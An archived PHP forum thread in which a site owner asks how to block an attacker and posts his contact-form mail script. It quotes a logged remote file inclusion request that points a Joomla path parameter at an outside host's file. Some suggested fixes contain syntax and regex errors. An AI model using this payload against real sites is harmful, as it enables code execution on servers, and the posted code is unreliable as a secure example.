martinjamesroberts Posted May 20, 2008 Share Posted May 20, 2008 Hello On my index page I have a contact form made in flash with a simple script file to send me the comments... I also have this guy who is trying to exploit my site for some reason.. Please, please, please can someone tell me how I can add code to my PHP script that will look for invalid parameters and redirect him off somewhere else...? My log shows what is below:- 209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008 Many Thanks Martin Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/ Share on other sites More sharing options...
martinjamesroberts Posted May 20, 2008 Author Share Posted May 20, 2008 Here is the contents of my script... <? // initialize variables for To and Subject fields $to = '[email protected]'; $subject = 'Enquiry'; // build message body from variables received in the POST array $message = 'From: '.$_POST['firstname']."\n\n"; $message .= 'Email: '.$_POST['email']."\n\n"; $message .= 'Enquiry: '.$_POST['enquiry']."\n\n"; // add additional email headers for more user-friendly reply $additionalHeaders = "From: Martin<[email protected]>\n"; $additionalHeaders .= "Reply-To:$_POST"; //send email message $OK = mail($to, $subject, $message, $additionalHeaders); ?> Thanks again.. Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545573 Share on other sites More sharing options...
MadTechie Posted May 20, 2008 Share Posted May 20, 2008 i don't see how 209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008 relates to that mail script! try this, post the debug info and i'll adapt the script to suite <? //Debug: echo "DEBUG: GET"; echo count($_GET); echo "<br>Post"; print_r($_POST); echo "<br>End Debug"; //End debug //the if below will need to be updated depending on the debug info. if(count($_GET) >0 || count($_POST) != 3) { die("Bad Parameters"); } if(empty($_POST['firstname']) || empty($_POST['email']) || empty($_POST['enquiry']) ) { die("Missing Parameters"); } if (!preg_match('/\{(\w+)(?::\d+)?\}/', $_POST['email'])) { die("Invalid Email"); } // initialize variables for To and Subject fields $to = '[email protected]'; $subject = 'Enquiry'; // build message body from variables received in the POST array $message = 'From: '.$_POST['firstname']."\n\n"; $message .= 'Email: '.$_POST['email']."\n\n"; $message .= 'Enquiry: '.$_POST['enquiry']."\n\n"; // add additional email headers for more user-friendly reply $additionalHeaders = "From: Martin<[email protected]>\n"; $additionalHeaders .= "Reply-To:$_POST['email']"; //bug fix //send email message $OK = mail($to, $subject, $message, $additionalHeaders); ?> Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545579 Share on other sites More sharing options...
martinjamesroberts Posted May 20, 2008 Author Share Posted May 20, 2008 Hi there, thanks for your reply I take it I save this as my new script and post a message? Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545588 Share on other sites More sharing options...
martinjamesroberts Posted May 20, 2008 Author Share Posted May 20, 2008 Also the script is in an external file, feedback.php. I only named the index file with the suffix .php as the flash movie contained within had a php script, is this necessary? Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545590 Share on other sites More sharing options...
martinjamesroberts Posted May 20, 2008 Author Share Posted May 20, 2008 I used the file containing the debug information but the email did not send. When I switched it back it did.. I have an SMTP server set-up with only itself allowed to send emails, maybe the exploit is directly from the index.php page and not the form script (feedback.php)? (Please note the index.php file doesn't contain code, it just contains the flash document which passes the variables to the script) I'm sorry I know this is a pain! Argh! Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545593 Share on other sites More sharing options...
MadTechie Posted May 20, 2008 Share Posted May 20, 2008 if index.php doesn't contains any php then i could be .html but personally i would keep it .php (you may add code to it later) I used the file containing the debug information but the email did not send i expected that, but the page should of displayed some debug data, Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545609 Share on other sites More sharing options...
martinjamesroberts Posted May 20, 2008 Author Share Posted May 20, 2008 Yup, i tried, nothing has shown up on the page.. it just performs the usual operation but doesn't send Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545617 Share on other sites More sharing options...
MadTechie Posted May 20, 2008 Share Posted May 20, 2008 okay just remove this //Debug: echo "DEBUG: GET"; echo count($_GET); echo "<br>Post"; print_r($_POST); echo "<br>End Debug"; //End debug //the if below will need to be updated depending on the debug info. if(count($_GET) >0 || count($_POST) != 3) { die("Bad Parameters"); } the reset should be fine Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545647 Share on other sites More sharing options...
martinjamesroberts Posted May 20, 2008 Author Share Posted May 20, 2008 Still won't send the message... Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545688 Share on other sites More sharing options...
MadTechie Posted May 20, 2008 Share Posted May 20, 2008 full script <? if(empty($_POST['firstname']) || empty($_POST['email']) || empty($_POST['enquiry']) ) { die("Missing Parameters"); } if (!preg_match('/^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i', $_POST['email'])) { die("Invalid Email"); } // initialize variables for To and Subject fields $to = '[email protected]'; $subject = 'Enquiry'; // build message body from variables received in the POST array $message = 'From: '.$_POST['firstname']."\n\n"; $message .= 'Email: '.$_POST['email']."\n\n"; $message .= 'Enquiry: '.$_POST['enquiry']."\n\n"; // add additional email headers for more user-friendly reply $additionalHeaders = "From: Martin<[email protected]>\n"; $additionalHeaders .= "Reply-To:$_POST['email']"; //bug fix //send email message $OK = mail($to, $subject, $message, $additionalHeaders); ?> Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545689 Share on other sites More sharing options...
martinjamesroberts Posted May 20, 2008 Author Share Posted May 20, 2008 Hello, I do really appreciate you helping me, but the script will not send unless I use the original.. could there be a syntax error somewhere.. I'm sorry I really am a newb and coulc not tell if there was.. Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545705 Share on other sites More sharing options...
martinjamesroberts Posted May 20, 2008 Author Share Posted May 20, 2008 Would it not be better to put a redirect script in the top of the index.php? Link to comment https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545745 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.